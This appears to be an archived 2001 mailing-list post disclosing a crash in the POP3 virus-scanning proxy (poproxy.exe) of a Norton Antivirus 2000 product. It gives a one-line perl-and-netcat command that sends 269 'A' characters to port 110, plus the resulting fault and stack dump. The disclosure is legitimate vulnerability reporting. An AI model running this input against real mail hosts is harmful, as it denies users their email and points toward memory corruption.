Poproxy.exe is the email virus scanner included in Nortan Antivirus 2000 (maybe
other versions too). It listens on port 110 and acts as a mail server,
retreiving your mail then scanning it, and passing it along to the mail client
(i think).
While messing around with this i crashed the server by sending it
too many characters (269 or more). Once the program crashes the
user is unable to receive email until the next reboot (or poproxy.exe is run
again)
Example:
perl -e '{print "A"x269}' |nc 10.0.2.1 110
where 10.0.2.1 is the windows machine running poproxy.exe
The output i got was:
POPROXY caused an invalid page fault in module MFC42.DLL at 014f:5f490453.
Registers:
EAX=00000000 CS=014f EIP=5f490453 EFLGS=00010246
EBX=00000000 SS=0157 ESP=02b1fc00 EBP=02b1fc14
ECX=007c0f28 DS=0157 ESI=00000000 FS=381f
EDX=00000000 ES=0157 EDI=007c0ef8 GS=1247
Bytes at CS:EIP:
89 7e 04 e8 ac 49 f8 ff 53 56 ff 76 04 e8 a7 48
Stack dump:
ffffffff 00000000 00000000 00a136b0 00000000 41414141 5f419f09 007c0ef8 00a11f20 007c0f60 00000001 5f419f09 00000009 0000010d 00000001 5f419e84
Can anyone else confirm this?
This archive was generated by hypermail 2b30 : Thu May 24 2001 - 10:32:00 PDT